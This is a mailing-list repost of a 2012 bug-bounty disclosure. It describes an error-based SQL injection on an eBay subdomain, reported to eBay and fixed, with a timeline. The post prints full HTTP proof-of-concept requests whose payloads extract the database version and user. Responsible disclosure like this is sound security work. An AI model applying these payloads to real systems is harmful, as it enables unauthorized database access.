[Owasp-natal] Exploitable SQLi on Ebay.com - Analysis

Noilson Caio caiogore em gmail.com
Domingo Novembro 25 18:03:01 UTC 2012


During some hunting on Ebay’s subdomains I found an exploitable SQL
injection which I reported to Ebay’s security team. It took 20 days until
they finally fixed the exploitable SQL injection.

The vulnerable page was located at http://sea.ebay.com/news.php and the
vulnerable parameter was the “checkbox” Array POST parameter. During the
research I found that everytime you put some SQL statements there it will
show you a typical SQL error message saying that the syntax is wrong. For
example when I supplied:
Enforcing an error message - @@secalert

1234

...POST /news.php?time=3&catid=31 HTTP/1.1...checkbox%5B%5D=(select @@secalert)

the webserver responded saying: “Unknown systen variable ‘secalert’.

But everytime I had supplied a correct syntax I saw no results. So the only
chance I saw there was to start a sub-query using a nested SELECT statement
which would then give me some results when the syntax of the main SELECT
statement is incorrect. So here we go:
SQL Injection PoC 1 - @@version

1234567891011121314

POST /news.php?time=3&catid=31 HTTP/1.1Referer:
http://sea.ebay.com/news/abpost/update/Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)Cache-Control:
no-cacheAccept-Language: en-us,en;q=0.5Content-Type:
application/x-www-form-urlencodedHost: sea.ebay.comCookie:
PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY;
Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=;
phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8Content-Length:
243Accept-Encoding: gzip, deflateProxy-Connection:
Keep-Alivecheckbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

The webserver then responsed with following message. I have marked the
interesting part showing version of the used DBMS.

To ensure that is not just a lucky random I decided to make a second
request asking for the current DBMS user.
SQL Injection PoC 2 - user()

1234567891011121314

POST /news.php?time=3&catid=31 HTTP/1.1Referer:
http://sea.ebay.com/news/abpost/update/Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)Cache-Control:
no-cacheAccept-Language: en-us,en;q=0.5Content-Type:
application/x-www-form-urlencodedHost: sea.ebay.comCookie:
PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY;
Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=;
phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8Content-Length:
243Accept-Encoding: gzip, deflateProxy-Connection:
Keep-Alivecheckbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

The webserver then responsed with following message. I have marked the
interesting part showing the current DBMS user.

Timeline

12345

October,  30th 2012: Vulnerability found and reported to Ebay (
securityresearch at ebay.com )November, 05th 2012: Vulnerability reported
to Ebay once againNovember, 05th 2012: Ebay confirms the presence of
the SQL injectionNovember, 16th 2012: Ebay replied that the SQL
Injection is now fixedNovember, 18th 2012: I've published this blog
post

 Posted by David Vieira-Kurz Nov 18th, 2012 Bug
Bounty<http://blog.majorsecurity.net/categories/bug-bounty/>,
Ebay.com <http://blog.majorsecurity.net/categories/ebay-com/>, SQL
Injection<http://blog.majorsecurity.net/categories/sql-injection/>


-- 
Noilson Caio Teixeira de Araújo
Linux Professional Institute Certification  2 - LPI000182893
ITV3F ITIL Foundation Certificate in IT Service Management (Syllabus 2011)
- EXIN063638
Novell Certified Linux Administrator (CLA) - 10111916
Novell Data Center Technical Specialist

http://ncaio.ithub.com.br
http://br.linkedin.com/in/ncaio
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-natal/attachments/20121125/6d0c11a0/attachment-0001.html>


More information about the Owasp-natal mailing list